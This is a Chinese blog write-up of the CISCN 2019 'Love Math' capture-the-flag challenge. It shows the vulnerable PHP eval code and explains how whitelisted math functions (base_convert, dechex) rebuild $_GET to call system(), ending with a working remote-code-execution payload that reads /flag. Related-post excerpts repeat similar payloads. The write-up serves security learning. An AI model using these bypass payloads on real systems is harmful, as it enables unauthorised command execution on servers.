buuctf-[CISCN 2019 初赛]Love Math(小宇特详解)

最新推荐文章于 2024-05-17 03:57:34 发布
最新推荐文章于 2024-05-17 03:57:34 发布
阅读量2.7k 收藏 9
点赞数 4
分类专栏: buuctf 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/123148026
版权

buuctf-[CISCN 2019 初赛]Love Math(小宇特详解)

1.先看题目

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

分析一下源代码

一开始是限制了传入参数的长度,然后有黑名单过滤,最后是白名单,这里的白名单是常用的数学函数。

这里说一下思路

1.先去传入一个参数,看一下是否能进行命令执行

payload:/?c=19-1

2.然后这里黑名单过滤了不少东西,常规的cat/flag都不能使用了,这里有个知识点是php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数比如下面的代码会执行 system(‘cat/flag’);

$a='system';
$a('cat/flag');

这里使用的传参是

?c=($_GET[a])($_GET[b])&a=system&b=cat /flag

但是这里的_GET和a,b都不是白名单里面的,这里需要替换

替换之后

?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag

但是这里的_GET是无法进行直接替换,而且[]也被黑名单过滤了

这里就需要去了解一下他给的白名单里面的函数了

这里说一下需要用到的几个函数

这里先将_GET来进行转换的函数

hex2bin() 函数

hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。

这里的_GET是ASCII 字符,用在线工具将_GET转换为十六进制

hex2bin(5f 47 45 54) 就是 _GET,但是hex2bin()函数也不是白名单里面的,而且这里的5f 47 45 54也不能直接填入,这里会被

 preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);

来进行白名单的检测。

这里的hex2bin()函数可以通过base_convert()函数来进行转换

base_convert()函数能够在任意进制之间转换数字

这里的hex2bin可以看做是36进制,用base_convert来转换将在10进制的数字转换为16进制就可以出现hex2bin

hex2bin=base_convert(37907361743,10,36)

然后里面的5f 47 45 54要用dechex()函数将10进制数转换为16进制的数

dechex(1598506324),1598506324转换为16进制就是5f 47 45 54

最终的payload:

/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag

小宇特详解
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
0130学习记录
一只菜鸡
01-30 667
[CISCN]Love Math *命令执行 *动态函数 打开场景,得到源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算");
buuctf [CISCN 2019 初赛]Love Math&&[BJDCTF 2nd]简单注入
为之的博客
07-15 668
一、[CISCN 2019 初赛]Love Math 根据代码意思,应该就是通过使用白名单函数或者当成变量来使用,同时要求长度小于80 看到最后的exec,我们需要构造出system($_GET['a']),而这个已经被挡住了,我们可以传入a=system,b=cat /flag来获取flag 但还是需要得到_GET,另外中括号可以用大括号代替 base_convert(number,frombase,tobase); 将number从frombase进制转化为tobase进制 hex2b.
[CISCN 2019初赛]Love Math
rev1ve的博客
09-01 1571
简单分析一下,只有一个GET传参参数是c,然后对上传的值进行黑名单检测,接着给了白名单以及常用的数学函数。这个提示很明显了,需要我们用函数进行转换成我们的执行命令。这里最后一个点,就是我们传递的参数值为两个(即一个是函数名 一个是参数),该如何绕过呢。这样的出来,但是这里对我们c的值进行了超多过滤,这里用的是构造出类似。呢,其实目的很明显,因为c的值不能有字母,而我们要想利用。解决方法是用php7的特性,就是可以用变量执行函数。关键点利用php动态函数的特性,比如我们可以构造。,这里需要用到的两个函数是。
详解文件包含漏洞_&lt; php show_source(__file__); error_reporting(1); i(1)
最新发布
2401_84976527的博客
05-17 797
htaccess是一个纯文本文件,里面存放着Apache服务器配置相关的一些指令,它类似于Apache的站点配置文件,但只作用于当前目录,而且是只有用户访问目录时才加载,通过该文件可以实现网页301重定向,自定义404错误页面,改变文件拓展名,禁止目录列表等。流程是先将三个过滤器叠加之后进行压缩,然后转小写,最后再解压,这样的流程执行结束后会导致部分死亡代码错误,便可以写进去我们想要写入的shell,原理很简单,就是利用过滤器嵌套的方式让死亡代码在各种变换之间进行分解扰乱,最终变成php无法识别的字符。
[CISCN 2019 初赛]Love Math
羽的博客
03-12 1927
首先来提一个概念:php中可以把函数名通过字符串的方式传递给一个变量,然后通过此变量动态调用函数比如下面的代码会执行 system(‘ls’); $a='system'; $a('ls'); 题目中有长度限制我们可以尝试构造$_GET[]然后在传入想用的exp,但是这里把中括号下划线禁用了,那么就得需要编码绕过了。 通过白名单我们看到了一些可能帮助我们编码绕过的函数 base_convert ,...
2019CCF-CSP-J初赛试题与解析.doc
10-08
2019CCF-CSP-J初赛试题与解析,提供给需要复习和练习的学生和家长老师等 2019CCF-CSP-J初赛试题与解析,提供给需要复习和练习的学生和家长老师等 2019CCF-CSP-J初赛试题与解析,提供给需要复习和练习的学生和家长...
2019-CSP-J-普及组初赛
06-10
2019-CSP-J-普及组初赛
2019CSP-S-提高组初赛
08-24
2019CSP-S-提高组初赛
2019CSP-S A卷初赛真题及答案.docx
10-20
2019CSP-S A卷初赛真题及答案2019CSP-S A卷初赛真题及答案2019CSP-S A卷初赛真题及答案
2019 CSP-S组 第1轮 初赛 答案+解析 好--13页.pdf
09-02
"2019 CSP-S组 第1轮 初赛 答案+解析" 本文档提供了2019年CCF非专业级别软件能力认证第一轮(CSP-S)提高级C++语言试题A卷的答案和解析。该试卷共有10页,满分100分,包含单项选择题15题,每题2分。 试题1:x+a%3*...
[WP/Buu/RCE]-[CISCN 2019 初赛]Love Math
車鈊的博客
08-08 182
[CISCN 2019 初赛]Love Math 源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); }
buuctf日记 [CISCN 2019 初赛]Love Math 1
weixin_45642610的博客
03-06 335
buuctf日记 [CISCN 2019 初赛]Love Math 1 payload c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{abs}($$pi{acos})&abs=system&acos=cat /flag base_convert(37907361743,10,36) #把十进制数“37907361743”转为36进制(0-9,a-z) base_convert(37907361743,10,3
bugkuCTF平台逆向题第五道love题解
iqiqiya的博客
12-28 8375
题目链接: http://123.206.31.85/files/99278e700add95793a765b13ab1314ea/reverse_3.exe tips: 查壳无壳(截图略) 载入OD 搜索字符串 随意输入1111111111111111111 发现进行了base64加密 再向下单步 发现、 结合IDA看下 int su
[CISCN 2019 初赛]Love Math 解题记录
weixin_44732566的博客
07-05 578
[CISCN 2019 初赛]Love Math 解题记录 0x01 打开题目显示源码 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不
2019年CTF4月比赛记录(三):SUSCTF 2nd、DDCTF、国赛线上初赛部分Web题目writeup与复现
極品━═☆宏的博客
04-25 3294
四月中旬以来事情还是蛮多的,先捋一捋: 首先有幸参加了东南大学承办的SUSCTF 2nd,虽然比赛的规模不是很大,但是这也是第一次以小组的方式正式参加比赛,也是对前期学习成果的检验。在同组成员的努(带)力(飞)下,取得了前十名的成绩,混了个奖; 后来又报名了DDCTF-2019,做了做web题目,当给国赛练练手; 紧接着小组报名参加国赛预赛,周六开始周日结束,作为web手,这web题做的是真尼玛自...
[ciscn 2019 初赛]love math
03-16
好的,以下是回复: 这道题目需要我们求出一个数列中所有数的最大公约数。我们可以使用欧几里得算法来求解。具体来说,我们可以用辗转相除的方法,不断将两个数中较大的数除以较小的数,直到两个数相等为止,此时的数即为它们的最大公约数。我们可以用一个循环来实现这个过程,不断更新两个数的值,直到它们相等为止。最后得到的数即为所求的最大公约数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值